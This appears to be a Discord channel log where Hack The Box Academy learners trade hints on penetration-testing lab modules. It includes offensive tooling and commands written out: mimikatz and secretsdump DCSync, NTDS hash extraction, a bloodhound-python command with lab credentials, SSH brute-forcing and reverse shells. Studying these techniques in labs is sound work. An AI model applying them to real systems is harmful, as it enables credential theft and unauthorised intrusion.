#modules
Yes
How do you expect PHP code to run Python?
You do the pty shell upgrade after connection
?? I don't know what that even means
The image.php is PHP code
The Python pty is... well, it's Python code
didn't do that module, sorry
Ok now I get it, just put it into the terminal once I'm shelled in
the python code is used after you get a shell, to upgrade to an interactive shell; it's not to create a reverse shell
Yep
@fathom pendant & @next bronze thank you for the help
Shrimple
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
I have used this command in PS:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} | Select-Object -ExpandProperty Message
And I have already tried all variants and none is the correct answer: user0, user1, administator, NOUSER
If anyone is running VMware Workstation Pro 17.5 and has issues with your VM freezing, there's this nifty button I just discovered that helps you clone your VM and make it compatible with the latest version of VMware Workstation Pro... no freezes so far after creating a clone and upgrading it
Has anyone ever encountered this error from mimikatz DCSync: ERROR kull_m_rpc_drsr_getDCBind? In such a case, does a workaround exist? Because what I found on Google is that it does not.
What does your full command look like?
This should be working AFAIK, administrator has DCSync rights. In the module it's done with noPac.py (which calls secretsdump.py)
Did you try with privilege debug?
xd
I've found some people here referencing the same error but no one answered them
Wait, are you now administrator?
i have his ticket
And trying to get your own hash?
the user I'm trying to dump hashes of is arbitrary
it is just not working, I'm going to check whether it's a double hop problem
by doing it from MS01
/user: flag🤔
what
I mean the flag /user:
yes what
Iirc isn't it the target?
what target
I am just trying DCSync from Windows using a ticket obtained with the noPac vulnerability
xD, wait a while, I'm trying to figure it out by checking my notes
Sounds great
maybe use another tool to dcsync then
Arbitrary is the user you're trying to DCSync right?
But why are you specifying /user: administrator
why would I xd
Xd
should work with mimikatz
Okay, I thought the user is "arbitrary"
HAHAH
But actually you're specifying yourself as a target with /user:
I mean you're now trying to get your own hash
It could be the reason why it is not working
But I am not sure😵💫
no lol
Module Broken Authentication
Question: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
So far what I have done:
||1. Issue a curl request to get the token for htbuser
2. Extract the date into YYYY-MM-DD hh:mm:ss format
3. Feed that into bash's built-in date function to convert the date to millis
4. Feed the produced millis to a modified reset_token_time.py script that uses the name "htbadmin" + the time in millis to create the MD5 hash, and use the produced hash to make a request to "check" to verify whether the token is valid.
I have actively tried debugging the issue to discover where in the steps I am going wrong (I assume in the last) but I have been unable to figure it out. Feel free to PM me for this issue.
||
did you convert to epoch time
Yes, I have stated it in the steps I have taken.
Hey guys, I am new to this server, so please tell me about this server and the modules. Actually I don't really know coding, but I think I'm going to learn something new in this server.
if it is working from the MS01, can it be Double Hop problem?
How can I "host discover" my hackthebox target machine?
Anyone free to talk about the Web Attacks Skills Assessment
Hello guys, on the FILE INCLUSION Log Poisoning section I have the flag but it's not working, can someone check for me?
Is it the fact that I'm using Remmina to RDP and it keeps disconnecting? Would other tools make it better? Has anyone had the same issues?
did you set the username as htbadmin to generate the token?
xfreerdp has never failed me
keeps disconnecting on both
especially after I type stuff in cmd
use TCP for the VPN
I'm now trying it on Pwnbox
I am stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS: DCSync
Every time I try to log in with the given creds, it fails, with PowerShell run as Administrator
I am using
User: htb-student
Password: HTB_@cademy_stdnt!
Can someone help me?
Can you explain a bit on how to do it
I am also facing the same problem
I have the option to download the VPN file
But to configure... ???????
go to vpn settings > select TCP 443 > download and replace your old .ovpn file
Thanks!!!
Would you know why mimikatz throws that error if and only if the TGS is for CIFS? Or is this just some mystery around mimikatz behaviour?
i got the DCSync with a LDAP TGS
tbh I don't use mimikatz for dcsync, but you requested a LDAP tgs and it worked?
yes xd
idk any other way to DCSync from Windows :S
my objective is to try to replicate as many techniques as possible from Windows and from Linux
relying a lot on impacket is not helping me
like, what if I don't have access to impacket in a real situation
you can use rubeus no? nvm I don't think you can
secretsdump))
oh! mimikatz uses LDAP to do the memory dump
has to be that
I've never seen that, let me google a little
there's also Invoke-Mimikatz
yea I have it but it's not different from mimikatz.exe
For an undocumented reason, Impacket's secretsdump relies on SMB before doing a DCSync (hence requiring a CIFS/domaincontroller SPN when using Kerberos tickets) while Mimikatz relies on LDAP before doing the DCSync (hence requiring a LDAP/domaincontroller SPN when using Kerberos tickets)
well, the "troubleshooting" made me learn some stuff
great
interesting
same bro this pivoting module is hard for me
at least I got the flag now
lab is only active for 89 minutes... any hints for finding better wordlists?
Use the provided wordlist in the module.
are you running the command on the right machine? the question asked for an account on the domain controller
What is the domain controller? I authorized like usual by SSH to the target
In the Sub-domain fuzzing section of Attacking Web Applications with Ffuf, it asks to fuzz a subdomain of inlanefreight.htb. The problem is, it doesn't provide a way to spawn an instance to target. Has anyone dealt with this before?
Thanks. I swear I tried that, but must have had a typo
Probably lol
Seeing as how I just made that typo 3 more times, I'm going to go with yes, yes it was
What's with HTB and inlanefreight? They use it everywhere
it's just a persistent story for the labs
Does HTB have no power in removing academy skills assessment solutions from youtube?
You can report them via the /spoiler command in the server
I reported them 2 months ago and nothing happened to the channel
He just keeps posting more and more spoilers
i'll double check, hopefully there would be a resolution to this
then don't watch them? what's so hard about that lol
they can't just tell YouTube to remove those videos unless they are infringing some copyright
sadly…
dont search for them (?)
guys, what do I do when I'm stuck?
Precisely I'm stuck in the Getting Started module in "public exploits".
you've only nmapped; why not try other methods
I assumed I'm supposed to look at the services on the target and find any exploits related to them
you are given an explicit ip and port combination
web enumeration is a thing
ooooooook thanks
Hi guys I stuck on "SQLMap Essentials " ==>> "Skills Assessment"
I got the -T final_flag but I can't C the content ...
I tried to C if I have write permissions (maybe trying RCE) but: "current user is DBA: False"
so I'm stuck don't know how to continue...
someone can give me a hint please?
😭 😭 😭 😭 😭
yes I have the adunn password
But I am supposed to RDP to the machine with htb-student and then open PowerShell, right?
Man... I am really facing issues with this RDP
Yes
Point to be noted..!
Ahh man.. this is really a pain 😭
BTW solved the password and hash
Thanks
Where is the LINUX01$ Kerberos ticket for the question:
"Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "
In linux pass the ticket
It's in an uncommon directory
var /___ /___ /.........
I saw that with linikatz, is it this one?
I don't even know which one I'm looking for
nothing says linux01
oh, I see it now, nevermind
I imported it and it worked fine, thanks. Linikatz was the way to go on that one.
just wrap it in backticks /var/...
Yeah... 😅
For the question:
Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.
I was able to find the Notes.zip, but it's in the root folder. I don't have access to the root folder.
Also, kira user has two passwords?
Doesn't make sense.
Nevermind, the locate option didn't work properly.
It was in the Documents folder, not root.
Hi there, I am new to Linux and I'm stuck on Linux Fundamentals print. How do I figure out the path to htb-student's home directory?
Try ||pwd||
also you can check the environment variables
someone?
so, you're able now to list databases?
Hey guys, I have a quick question about Active Directory Skills Assessment 2.
yes found it in ||production||
but can't C its content ...
In one of the questions, they asked to connect to MS01; we can do it using a specific account obtained before
How can that specific account work on MS01, as I thought it was a local account?
list the other databases too, probably you will find it
You can DM me for more details, I didn't want to spoil
which question?
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
so you were able to connect to the sql01 right?
Yes
I finished answering the question
Because I followed some tutorial and help online
DM, there are a couple of ways
I'm stuck at module Attacking Common Services the first exercise Attacking FTP. To the point that I think the machine is broken. The task is to access the FTP server but no port is open revealing FTP. I got into the machine a different way and according to systemctl the service proftpd failed. :S
Also reset the machine and waited > 60 seconds after IP appears as per the instructions.
Which port did you scan ?
All ports.
But looking at #858470491676737536 it seems the box is just super unstable and requires 3-4 resets before it boots correctly. Earliest mention I could find is a month ago, seems it has not been fixed.
I'm getting increasingly frustrated with HTB academy.
I think it happened to me too in the past
Don't worry, not every machine works this way
I might have been lucky but I was able to find the service
I can pm you my nmap output if you like
On my third or fourth reset now and finally a promising port showed up.
Here you go !
Did anybody succeed in installing BloodHound on ParrotOS?
When I installed it, it threw errors that I corrected with that link
But when trying to put a collection in it, it shows me upload complete and 0%
Which seems to be a trouble from the version 4.0.3 of bloodhound
So I tried to install another version, 4.1.0, which is not visible from apt I think
make sure your collector is the right version for your bloodhound installation
Mmmmmh, I got my collector from SharpHound
Which is not the same version as bloodhound
sharphound v2.0.0 for bloodhound v4.3
it will tell you which version it's compatible with when you run sharphound
why are you using such an old version
Because when I apt-get install bloodhound, that's what apt gives me
I tried getting the latest version from the zip file in the release but I don't know how to install it
the version available in apt is 4.3.1 I think
└──╼ $sudo apt-get install bloodhound
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
bloodhound is already the newest version (4.0.3-0parrot1).
The following packages were automatically installed and are no longer required:
gconf-service gconf2-common libc++1 libc++1-11 libc++abi1-11 libgconf-2-4 libopengl0
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 290 not upgraded.
When I tried to install from the following link https://github.com/BloodHoundAD/BloodHound/releases
I downloaded
BloodHound-linux-arm64.zip
But when I launch BloodHound, it does nothing
even with chmod
should be just ./bloodhound --no-sandbox
bloodhound itself is really just an electron app
Mmmh, it looks like I made a mistake
BloodHound-linux-arm64.zip
Was wrong
I had to install BloodHound-linux-x64.zip
Thanks XreOuS
Now I have to fight to upgrade neo4j... Dependency troubles are never over...
Module: File inclusion
Section: Upload exploitation
Are you supposed to be able to get a reverse shell? I've tried both the one from pentestmonkey and msfvenom without any luck
There is also BloodHound Community Edition, which provides a docker-compose file. No dependency trouble there.
https://github.com/SpecterOps/BloodHound
Although I haven't used it much yet. The interface has changed and I'm missing the clickable default queries.
Thanks!
a lot of things are missing from BloodHound CE, wouldn't recommend it unless you know how to write your own queries
I'm just trying to finish Active Directory Attack module
think you need a webshell instead
I solved the flag with a web shell
but since the session brings up reverse shell, I assumed it would be possible as well?
normally yes, but the target in the lab is in a docker container
ok
cause this looks correct right?
and i have uploaded the shell and visited the upload/shell.php url
yeah looks right
ok, then I guess it's time to move on
lucky me that I didn't spend an hour or so trying to solve this...
can someone help me with the footprinting medium lab? I need some hints, I'm not sure where to head next
hi. I have SSH'd into t** and didn't find anything useful in the directories other than his own ssh and sql history. could you point me in the right direction on how to move forward?
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
Firstly, I connected to the target (user10 in this exercise); after that I found the domain controller "ACADEMY-ICL-DC"
I have used this command in PS:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} | Select-Object -ExpandProperty Message
And I have already tried all variants and none is the correct answer: user0, user1, administator, NOUSER
my guy, I already told you to run the command on DC
I have done it there too, but still getting the same results
what's DC's hostname? you found the DC but did you run the command inside DC?
Host Name . . . . . . . . . . . . : ACADEMY-ICL-DC
did you then ssh into dc and run the command?
Yes, I connected by ssh user10@172.16.5.155
oh, I see that now, I guess that found this
Why can't I start the next module (INTRODUCTION TO BASH SCRIPTING) if I have completed all the previous ones? There are not enough cubes
hey friends, I am at Attacking Enterprise Networks - Active Directory Compromise; when trying to kerp I get this error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great). Googled it and found I have to use the tool ntpdate or rdate, tried them with proxychains but it didn't work, any hint please?
Ntpdate is the way, you just need to figure out what it does and how you can use it
Can I use a file to specify username formats in username-anarchy? If so, which option should I use?
Hi guys,
I need a nudge for the password/credential hunting in Windows module. I got the credentials for WinSCP, but they seem to be wrong, or at least give me access denied. I also tried the other ones and every combination of username and password (I think at least). I can't seem to get it to work. What am I missing?
not sure what you mean?!
I got 2 databases:
||information_schema||, || production||
Hello, all. I've signed up for the HTB Academy Silver account and am doing CPTS now. I'm on the "Getting Started" module and they are doing the Nibbles machine. It says I can't play the machine unless I sign up for $14/month. Is this true? I kind of assumed the machines in the course would be already paid for. Just wanted to verify that in case there's a "free" way.
Is your subscription active? Do you have the annual subscription or the monthly subscription?
With the monthly subscription you only get a number of cubes and then have to buy the modules.
I have the annual Academy subscription. Nothing on the labs. But, I think I just needed to scroll down more because there's an option to spin up the target machine. Thanks
did you check tables inside them?
Anyone else having an issue getting the in-browser OS to start up?
I need help with the Footprinting hard lab, I'm close to finishing it :3
What did you try, what are you stuck on
dm me what creds you have
do I DM you?
No you don’t
okay, I got to a point where I accessed credentials, specifically, and this is where I'm at: ||tom's password, and I have SSH'd in but I don't know where to go next. I have tried to read the bash_history and sql_history files but I can't seem to figure out where to go next||
I used toms creds for imaps
okay ill try that
i did that too and i ||ssh'd in||
If you got the key from IMAPs, you can ssh to root
to root?, let me try
oh it worked!, thank you im confused how i never thought of that
I am doing the Network Enumeration with Nmap module, and on the service enumeration part, while solving the question, I am confused and stuck: which service has the flag? Can anyone give me some suggestion on how I can solve it?
Doesn't the section tell you that sometimes you'll need to use netcat to connect to a service?
yes I tried to connect to the service but I am not sure which service has the flag?
or after connecting to service what should I do in order to get a flag?
username-anarchy/username-anarchy -i users.txt -F rule.txt
Can someone help me with this tool please?
%F%M%L
%L%F
%f%m%l
%f%l
%l%f
This is the rule file I created
Just wait, usually takes ~10-15 seconds to spit it out
This is the output I get
ok i will try it again...thanks🤘
does it support rule files?
I dunno
I checked the readme there was no mention of rule files only single formats
then it probably doesn't
ok thanks
Awesome!
HI! I got stuck at the Attacking Common Services medium skills assessment. I tried to bruteforce the open ports with no luck, but got the dig AXFR subdomains and that's it, can someone help please?
did you scan for all ports? there is a service on a non default port
Yes I found that one and tried with hydra
Did you specify the port with hydra?
did you find more ports?
found 5
so far these ports: || 22, 53, 110, 995, 2121 ||
scan with -p-
I started doing that one, thank you
good luck
found it thank you
Hi all, I am stuck with this question in the Linux Module: "What is the path to htb-student's home directory?"
echo $HOME
I have already tried using the pwd and echo $HOME command.
/home/htb-student
Thanks, it worked.
You're meant to spawn target and ssh to it
Read just above question 1
enough if you said only 'read'
Whenever you see Target: Click here to Spawn the Target System above a set of questions... click it
You spawned the pwnbox
Okay. I am still new to the platform. Trying to learn it.
Lol, I jumped over to Linux Fundamentals module cause I wanted to try out Linux with School.
This module
It's still good to know how the platform works 😉
Thanks, I will try to complete it first and then continue with the Linux module.
Much appreciated!
It works well, but I also had to look for another way. Without spoiling, I can say intercept with burp and use burp to look for what you are searching. Developer tools from browsers are also a very good option. The original bash script and the curl from the course module don't work for me either.
Hello Guys,
PetitPotam section:
how do we know this is the target --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp ?
If it's about attacking certificate authorities then that's probably some sort of default path
but the hostname in the exam won't be guessable xD
you just get hostnames from scanning
The academy host names have been consistent
but also scanning
that part's assumed to have been done already
its not 🙂
Do you experience an issue on module ATTACKING WEB APPLICATIONS WITH FFUF with the question "Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?"? When I use ffuf, it runs a few seconds and slows down to 1 req/s... but the big issue is that when I stop the command, I don't have Internet access, and that impacts all my VMs running in NAT mode. I need to reinstall VMware in repair mode to recover Internet access.
but a quicker and simpler way is running certutil.exe from a domain joined host
to obtain certificates?
to obtain the hostname
Hi I am in the Active_Directory and ntds.dit section of password attacks and have successfully captured the ntds file. How can I extract the hashes from it?
That's a personal problem my guy
not if you don't have access to a domain joined host
Read the section
I should be scanning 172.16.4.0/23, is what you mean
but I'm not doing that at this moment xd
not enough energy
I read but there was no mention of anything to extract the ntds contents. In the last section on LSASS attacks there was mention of a tool, pypykatz, but I read its help and there was no ntds in it
The ntds should have the hashes in it iirc if you just cat it
wait what you cat ntds? lol
No
It's been a minute since i did that module
so
I tried to use cat on it but it turned weird
XD!
:^)
sad my terminal crashed
A Faster Method: Using cme to Capture NTDS.dit
Just use secretsdump
check this out
I did do it
mate literally run netexec with --ntds flag
and it returned plaintext
yes I am saying it works
I just wanted to know a method for doing it the long way
just for notes purpose
secretsdump
^ for offline dumping
or the Golang version
better for big NTDS.dit files
ok I will try it
They want to do it the longer way
okk
They explicitly said it
^
sometimes the longer way is more reliable ¯\_(ツ)_/¯
to use secretsdump do I need the HKLM\system file?
why are you not reading the documentation
I read it
I believe so
But not 100%
secretsdump -ntds ntds.dit.save -system system.save LOCAL
¯\_(ツ)_/¯
do I need to install from the repo or will just cloning work? because I am getting an error
Ok i got it
hi all
any idea of this?
Hi
I'm stuck in the Nmap module in the hard IDS lab, but I read the walkthrough and solved it. I need to know why we use nc --source-port 53 and why ports 80 and 22 didn't work?
you should use the binary from release
Hi guys, I just arrived on the server. I'm really stuck on Password Attacks - Protected Files; the description says that we should use the cracked password of Kira's account but I don't see anything related to the user kira. Nothing in /etc/passwd and LaZagne didn't find anything. I'm really starting to struggle with this
you're specifying the source port of the scan with --source-port, port 53 is the dns port. it should've been mentioned in the module
look for the file id_rsa
but during the scan both UDP and TCP ports on 53 are closed, how does the connection occur?
I'll try, thanks for the hint
Hello, excuse me, I don't understand, where is the flag?
typed the wrong thing, my bad, --source-port sets the source port for your scan. from the receiver's perspective, the traffic will appear to be coming from whichever source port you have set
I am confused because ports 80 and 22 are open, and the connection has not been initiated
the flag will be pretty obvious, it's not there
what
during the nmap scan port 80 is open, when I use nc -nv -p 80 TARGET PORT, THE CONNECTION IS REFUSED
is the PetitPotam attack possible over a pivot? I ask because everything for this attack is done through a domain-joined machine and in the exam this can be different.
just because it's open doesn't mean you can nc to it
I get it, thanks 🙂
I'm able to get a response using this command, maybe you did something wrong there. anyways port 80 is an http port, more than likely you can just go there in your browser
can you please give me the command you used ?
same as yours
and you got the flag ?
no? the flag is not supposed to be there
nc doesn't tell you the service version, need nmap for that
the destination port in my case is 50000, so does it make sense?
I think anything relay is quite difficult if not impossible over pivots, you need an internal host to stage it
in this case it is not a relay but just spoofing I think xD
but cool i got it with ligolo-ng
hello guys, I need help with AD enumeration & Attacks skills PART 1, when I upload chisel.exe, this error appears
I used this command nc -nv -p 80 targetip 50000 but the connection is refused even though port 80 is open
Is it possible for someone to explain cd.. command in simple words? Sorry, I am confused right now.
hey is there a way to use light mode in htb academy
you're asking why even though port 80 is open on the target, specifying 80 as the source port doesn't work? also spoilers, remove the command please
rn my eyes can't focus in dark mode
someone?
dark reader extension but set it to light mode 
yes this is the point i did not understand
dm me with more info
nah it makes light mode like yellow
port 80 being open on the target means nothing; in your scenario, the target probably disabled traffic from port 80. port 53 is for dns traffic, which is usually more trusted https://nmap.org/book/firewall-subversion.html
you can adjust the scheme and mode
it only works with static mode
change your current directory, it's like you double clicked to open a folder in windows
this is what i get from force light mode 
Cd, change directory
I tried to look for id_rsa but there is nothing in .ssh/
thanks
If that’s with the hint LoveYou or something like that, use the hashcat rule on that and bruteforce Kira
Nice try but there's no hint for that question
lol I would check it but I don't have the password for the user
If i try to login locally, the user kira is not even recognized
what's the user you used to login?
Are you ssh to the target?
so you didn't ssh into the target?
No I didn't, I suppose kira is the user I have to use to connect to ssh but I don't see how to get its password
oh it's this one
mutate the password list given with the rule, then use that to bruteforce ssh with the user kira
Oh ok i'll try that tomorrow, thanks for your help
might want to do it overnight cause it's gonna take a while lol
I wouldn't brute-force SSH
me too but.. you're supposed to for that question
if it's the question I think it is, you can, but you don't have to, it just says to SSH in to get the flag, but there's other services running
ah ok that's probably the better way, can't remember how I did it
Is there anyone I can connect with and gain knowledge from?
Why am I getting this error while I use smbserver.py to copy from pwnbox to victim?
Greetings!
gain what knowledge?
hello
i am doing the Attacking Tomcat module in CPTS
i need some sanity check
if its possible
you have to setup credentials
Obtain remote code execution on the http://web01.inlanefreight.local:8180 Tomcat instance. Find and submit the contents of tomcat_flag.txt
I think he just can't write to C:\, you don't always need to set up creds
this is the last question
going through the examples, none of them works, I guess it is intentional?
You can brute other services
it worked
from some version of Windows onwards you need to
I think you just upload a war file
if I try to upload the war file it just hangs
I also modified the jsp file as mentioned in the module to bypass
that should work, I don't remember doing anything special for that section
you sure about that? just tested on a win11 host and it works without creds
reset maybe? pretty sure you just need a war reverse shell for that
in my Win11 it doesn't work
i get authentication error
it is related with the Guest access
@next bronze can you try if it works for you?
I'm not sure, mine is just a standard win11 install
me 2 🙂
as I told you it does not work without credentials
i think you have some extra setting
by default it is disabled
Starting from Windows 10, version 1709 and Windows Server 2019, SMB2 and SMB3 clients no longer allow the following actions by default:
Guest account access to a remote server.
Fall back to the Guest account after invalid credentials are provided.
I have yet to encounter a windows machine that does that
does what?
needs creds to access smb
fresh install Windows 10 v1709 or newer
and you will get it 🙂
can you read? i think you are a smart individual, it says by default on Win10 v1709 onwards
you had to disable it in Win11
it was introduced in Feb 2023 tho
nvm
it is the article date
October 2017
isn't this just for enterprise?
no
idk, I just tried on my win11 without creds and it worked
I just used a regular msfvenom payload and it worked
I'm not saying that you're wrong, just that I have yet to see a machine that needs creds for smb, be it win 10 or 11, relax
I tried this too but for me I can't upload the file on the page
@next bronze interesting, it must be my browser then, fuckin firefox.. I tried now with chromium and it instantly uploaded..
i wonder what is the reason
I used firefox
Hey guys, here's another question; I need your help.
Question: What is the index number of the "sudoers" file in the "/etc" directory?
Perhaps when you spell it right?
Lol, that was cruel. Thanks, much appreciated! @analog dock
use tab completion, can't spell it wrong if they fill it in for you
So, I ended up using the cd /etc then stat /etc/sudoers
Hi, I'm having trouble connecting the VPN in my own VM. I use a Kali virtual machine in a Windows OS. When I try to connect to the academy VPN using openvpn it connects but nothing works later, I mean, the academy web page can't charge
I don't know what is happening because when I connect to the VPN with windows and then I open the VM, it works, but when I connect from my VM it doesn't
maybe have a look at network settings of Virtualbox or VMware.
It's in NET option
what's supposed to change there
I would like to connect to the VPN directly in my VM because it's from where I'm working
I know that, have you tested if you could connect to any of the module targets?
wdym "academy page cant charge"
I can but then I cannot submit my answers or change sections because the webpage can't load any content
It can't load. Sorry, English is not my native language
the academy vpn shouldnt affect that at all, odd
yeah you don't need a vpn to load the academy webpages
Oh man. These hydra attack modules get me every time. 72h of bruteforce remaining. Hoping that admin is the right username.
But do I need it to connect to the section target?
what?
72h?
And it also happens when I'm working on starting point in HTB labs :'(
well don't load the academy vpn while doing starting point
I mean, the starting point VPN does the same thing
It's not just with the academy VPN, it's all VPNs
vpn connection in your vm makes the pages not load in your host?
If by host you mean windows os, no, it works just fine. The problem comes when working in the VM
why not access them from windows then, you don't need vpn to load academy pages
is this the exam?
Yes, but it says this:
what about it?
It says to download a VPN connection file and I guess it's for connecting to the target
Isn't it?
yeah, you connect to it in your vm
Yes that's exactly what I can't do
Because then the webpage can't load if I'm connected to the VPN
And then I can't submit the answers
hence I asked this, connecting to vpn in your vm makes it so that you can't load pages in your host (windows)?
No
Anyone know why I get this error when running dacledit.py?
so if you're able to access academy in your host, you can submit answers there
Yes and I found out now that the user was not admin. 😂 i read the hint.
But it's uncomfortable to work like that, that's why I'm trying to solve this. Maybe now it's just for the academy but I need to do more things and maybe it's not a good way to work. Anyway, thanks!
ok I see what you're trying to do. connecting to vpn shouldn't break other pages, make sure your vm network adapters are configured right, reinstall openvpn, restart
you need to also get the additional module in the PR
I found the msada_guids.py that is in the /impacket directory. I copied it over to the /examples directory and it still does not work
What is the 'PR'? Sorry, I am not much of a programmer so I don't know what that means
/usr/lib/python3/dist-packages/impacket/msada_guids.py
I should copy the msada_guids.py file to that path?
dacledit.py is not in the main impacket branch, it's still an unmerged pull request for now
My network adapters are on the NET option, is that correct? And, since I'm working in Kali, openvpn came preinstalled, how can I uninstall it? Sorry I'm kinda new to this
yes, but first make sure the other impacket modules are in there
Here's another question.
What is the name of the last modified file in the "var/backups" directory?
adding a bridged adapter might be useful
sudo apt remove openvpn then sudo apt install openvpn
I am not seeing msada_guids.py in that path...I will copy it over. I do see the /impacket and /impacket/examples paths
I copied the msada_guids.py to /usr/lib/python3/dist-packages/impacket/ but I keep getting the same error
hmm did you get those two files from github?
Guys, any hints for this question?
google "ls show last modified"
I am pretty sure I did, but it was a while ago.
I remember using dacledit when I was doing the DACLI module and it worked just fine...now it throws that error
what's your impacket version
The impacket I am running from my home folder is impacket==0.9.25.dev1+20230823.145202.4518279
I have another installation in my /opt folder...the /opt one does not have dacledit
thank u! is there anything special I have to do when I change to bridged adapter?
you might want to update it, the current dacledit.py is for v0.11. dm me
nope, just add it in your vm's config
How do I update it? I have been trying python setup.py install and then python -m pip install -r requirements.txt
okay thank you!
use pipx
and remove the old versions if dacledit is the only modification you made
So pipx install -r requirements.txt?
python3 -m pipx install impacket
This is where I got the other version of impacket that I installed on my home directory: https://github.com/ShutdownRepo/impacket/tree/dacledit
Anyone on that is familiar with searchsploit? Working on the knowledge check for Getting Started. Did the scan, used searchsploit to find the exploit, but not sure what to do next. Went back to the lesson and it only showed how to search, not how to use the exploit.
oh you're using that branch, I'm not sure if it's up to date with the main branch tho, it's better to use the main branch then make changes when you need to. up to you
I got it to work! I forgot I needed to set up a python environment first, just like in the DACLI module
depends on whether it's a metasploit module, if it is, it's available in metasploit under the same name, if it isn't, use
searchsploit -m <id>
to copy it to your current dir, then open it in an editor, there should be instructions in there on how to use it
nice
Thanks for your help! I appreciate it!
@next bronze so I think I missed a step which is causing some of my confusion, I've been footprinting but can't find anything that would help me get in to get a foothold
Been looking at the source code and haven't been able to find anything
Here's another question.
What is the name of the last modified file in the "var/backups" directory?
did you go visit the target in your browser?
@next bronze yes I'm at the target in the browser, I'm inspecting the source code but can't find anything in the HTML
don't need to look at the source code, what you need to exploit is right in front of you
you're asking about the Public Exploits section right
@next bronze so I'm on the last page "Knowledge Check". I'm trying to gain my foothold into the target but I'm not finding anything on it
@next bronze I got in... sometimes trying the most basic thing is the answer
Any help for this one?
i understand you now, impossible to make a DCSync from windows probably due to Double Hop but got it working at 1st try with secretsdump.py 🤷
yeah maybe, secretsdump.py is bae for DCSync
i finally completed the room. i thought the ssh keys were to ssh into toms.

Hello,
Can I ask for advice on module paths here?
sorry, new to this discord thing and hackthebox as well!
Just ask your question
Read #welcome
I have 6 years of experience in WebDev and am thinking about switching to webapp pentesting. So I am interested in doing the job role path for pentester.
My questions are:
- Based on 3 days/week of study, is 1 year enough to complete those modules?
- Should I study other modules before starting this one?
Information Security Fundamentals path is recommended as pre-requisite knowledge
Hello everyone 👋🏻
can someone help me with the 'attacking web applications with ffuf: skill assessment-web fuzzing' module, I've been stuck in a question that says "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?". i found a page that does: http://faculty.academy.htb:47456/courses/linux-security.php7 but it keeps giving me a wrong answer. any help would be appreciated
nvm i just found the answer. instead of the actual port i had to type 'PORT'
dont know why its like that but whatever
because the port is randomized on instance spawn but the answer box isnt dynamic enough to adjust accepted answers.
hi guys i have a technical question: if someone has iis7 that means he has windows server 2008. can he change the iis7 to a higher version or does he need to change the whole windows server version to a higher one, 2016 or later?
from INFORMATION GATHERING - WEB EDITION
IIS 7.0-8.5: Windows Server 2008 / Windows Server 2008R2
hi, I am new to ethical hacking and i found hack the box. i think this is a good place to learn many things about ethical hacking, but i don't know which path is best for beginners. Can someone recommend what the best path for beginners is in the "path tab" on hackthebox's website?
hi friend, sorry for late reply, with "proxychains ntpdate -qu 172.16.8.3" i got "ntpdig: no eligible servers"
i searched for it and cant find any useful info about it
I should have read your post before closing my pc 😅 now i'm stuck with that 60h bruteforce. As @hallow kiln said i tried to nmap the target and i found an ftp service and 2 smb services. I didn't find anything interesting yet
You can brute force a different service, FTP is much quicker
And you can use more threads for it, 48 is good
Yep but it takes 21h to bruteforce it
Ah yeah i'll try that way
Something's wrong tbh, cause even brute-forcing SSH shouldn't take 20 hours much less 60
try without the -qu flag
It says 1h44 with -t 48. I think it will do the job. Yeah 60h is really ridiculous, i don't know why it takes so much time with one user
In any case thanks for your help
you're using the mutated wordlist and not rockyou right?
Yeah i mutated password.list from the resources and i used the rules packed in
@hallow kiln do you remember if in the AD module you could map domain trusts with Bloodhound? i get No returned data from query but the section indeed shows the data returned correctly
Guys, I started this CTF thing today and I need help. I started my first CTF challenge, I spawned the target ip but nothing... there are no indications on what I should do, it only says "use cURL and get the flag"; above there are very minimal examples where there is nothing useful. even doing "curl <ip port>/index.html" or "curl -s -O <ip port>/index.html" does nothing. It says that the flag is in the "download.php" file but I don't know how to get there due to lack of explanations. Help me, thanks.
Does it show what exactly the trust relationship is?
this is my problem.
where?
On the lines between them?
i am not getting anything
Yep, screenshot in my notes is from my own VM, mapped them just fine, for the record I was using bloodhound-python
do you see the other domain if you search domain: ?
yes i do
then it didn't capture the trust properly, had that happen a few times
There's some data written to it that speeds up future runs, like if you're running bloodhound on a loop
it's a local cache, you can disable it with --memcache which will use ram as cache instead of a local file
yeah I avoid using sharphound if I can, takes way too long and still need to transfer them out
yeah, I don't remember the last time I ran sharphound
But it should be catching the trusts
Yup
i used that
i have a pivot but i dont think this should be affecting xd
bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
that is my command
if you are just looking for the trusts try SharpHound v1.0.4 (got the same issue in offshore)
could it be the machine somehow? cause if I recall properly I ran bloodhound-python sometime at the beginning of the module and don't remember if I ever had it to run it again
the only thing i get is a lot of DNS queries fail with bh-python but i think thats normal
coz the actual lab has only 3 machines
try with --dns-timeout 30 --dns-tcp at the end of your command
once it starts querying computers it does get a lot of fails since they're not active like you said
i still cant map domain trusts xD
hello, i have a problem on the blind sql injection module, has anyone finished this module?
but why people got it working?
i want to understand ...
I am stuck on the time based sqli (data extraction) question,
I have dumped the database name, tables, and the columns but i am not able to dump the data
maybe?
wish I knew mate, bloodhound ingestors can get weird and miss things
u on the Domain Trusts Primer section? the SharpHound thing worked for me but i'll give that a check when i can if you still have this issue
fixed in 4.3.1
thank you
yes i am
im on 4.3.1 and it should be fixed 
oh no that's an old version of SharpHound the new one never got the trusts for me
maybe the built in query is broken? try this
